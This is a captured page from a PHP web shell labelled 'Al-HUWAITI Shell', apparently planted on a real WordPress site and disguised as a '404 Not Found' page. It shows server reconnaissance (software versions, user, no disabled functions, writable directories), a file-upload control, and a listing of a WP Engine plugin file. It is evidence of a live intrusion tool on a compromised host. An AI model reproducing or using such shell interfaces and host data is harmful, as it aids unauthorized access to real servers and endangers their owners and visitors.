hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /www/docs/www.obu.edu/wp-content/mu-plugins/wpengine-common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /www/docs/www.obu.edu/wp-content/mu-plugins/wpengine-common/dify-partial.php
<?php

/**
 * Output the basic structure where dify content will be placed in the wpe widget or plugin in wp-admin
 * @param string $show_hidden The string 'true' if we are displaying Dify posts that are hidden for QA style checking
 *	      'false' if only showing live content meant for production
 * @param string $install_name The install who's wpe-admin we're currently displaying dify for
 */
function display_wpe_dify($show_hidden, $install_name)
{
?>
	<div class='wpe-dify-posts' data-page=0 data-source='wp_admin' data-show-hidden=<?php echo $show_hidden ?> data-install-name=<?php echo $install_name ?> >
		<hr class="wpe-dify-section-break">
		<div class="wpe-dify-section-title">
			<h2>WP Engine has your back</h2>
		</div>
		<div class="wpe-dify-content">
			<ul>
			</ul>
		</div>
		<div class="wpe-dify-show-more">
		    <a href="#">Show More</a>
		    <img class="wpe-dify-blog-spinner" src="<?php echo WPE_PLUGIN_URL; ?>/images/ajax-loader-transparent.gif"/ >
		</div>
	</div>
<?php
}

Al-HUWAITI Shell